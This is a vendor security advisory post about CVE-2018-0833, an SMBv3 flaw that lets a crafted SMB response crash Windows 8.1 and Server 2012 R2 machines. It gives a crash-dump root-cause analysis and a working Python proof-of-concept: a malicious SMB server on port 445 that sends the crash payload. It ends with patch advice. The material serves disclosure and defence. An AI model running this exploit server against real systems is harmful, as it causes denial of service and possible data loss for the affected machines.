After last year’s Service Message Block (SMB) ultra-shock, this year a new denial-of-service vulnerability is discovered in SMBv3 which can be exploited to crash Windows 8.1 and Windows Server 2012 R2 machines with a single packet. This vulnerability has been assigned CVE-2018-0833.


Technical Jargon:

The negotiation of the SMBv3 session always starts with an SMBv2 session. SMB2 Transform_header is used by client or server to encrypt messages. The SMB2 Transform_header is only valid for SMBv3.

As denoted by the above images, from the 9th frame encryption is set and the byte sequence in the header is 0XFD. Now what happens if an SMB packet with 0XFD header is sent even before negotiating the session?

All hell breaks loose and the system goes crashing down with no option but to restart it to restore functionality.

Let’s dig in a little deeper and seek out the root cause of it.

As we analyze the crash dump using winDbg, it says “Probably caused by mrxsmb.sys ( mrxsmb ! SmbWskReceiveEvent +8539)“. The mrxsmb.sys module is where the crash occurred which is a Microsoft Server Message Block (SMB) redirector. The exact place of the crash is mrxsmb!SmbWksReceiveEvent+8539 where a move occurs from [ecx+30h] to register EAX, the value of ECX is pointing to 0x00000000.

The crash occurs because the ECX is pointing to 0x00000000 and tries to read the value from 0x00000030 which is protected memory space. This leads to kernel panic and forces restart.


Exploitation Technique:

To exploit this vulnerability an attacker can host malicious SMB server, and can then deceit the target in sending SMB session request to the malicious server which replies by sending back a crafted response and causes the system to crash.


Proof-of-Concept:

import SocketServer
from binascii import unhexlify
payload = '000000ecfd534d42414141414141414141414141414141414141414141414141414
141414141414141414141414141414141414141414141414141414141414141414141414141414
141414141414141414141414141414141414141414141414141414141414141414141414141414
141414141414141414141414141414141414141414141414141414141414141414141414141414
141414141414141414141414141414141414141414141414141414141414141414141414141414
141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141'
class byebye(SocketServer.BaseRequestHandler):
        def handle(self):
                try:
                        print "From:", self.client_address
                        print "[*]Sending Payload..."
                        self.request.send(unhexlify(payload))
                except Exception:
                        print "BSoD Triggered on", self.client_address
                        pass
SocketServer.TCPServer.allow_reuse_address = 1  
launch = SocketServer.TCPServer(('', 445),byebye)  
launch.serve_forever()

Impact:

The system goes crashing down and won’t gain back functionality until reboot. It may affect organizations as unprecedented crashes may lead to data loss, delays, system reboots, etc.


Solution:
To mitigate this critical vulnerability Microsoft released security patch. Click here to download security patch for respective affected operating systems.


SecPod Saner detects these vulnerabilities and automatically fixes it by applying security updates. Download Saner now and keep your systems updated and secure.

 

Summary
Windows SMB Blue Screen Of Death (BSOD)
Article Name
Windows SMB Blue Screen Of Death (BSOD)
Author
Loading Facebook Comments ...

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>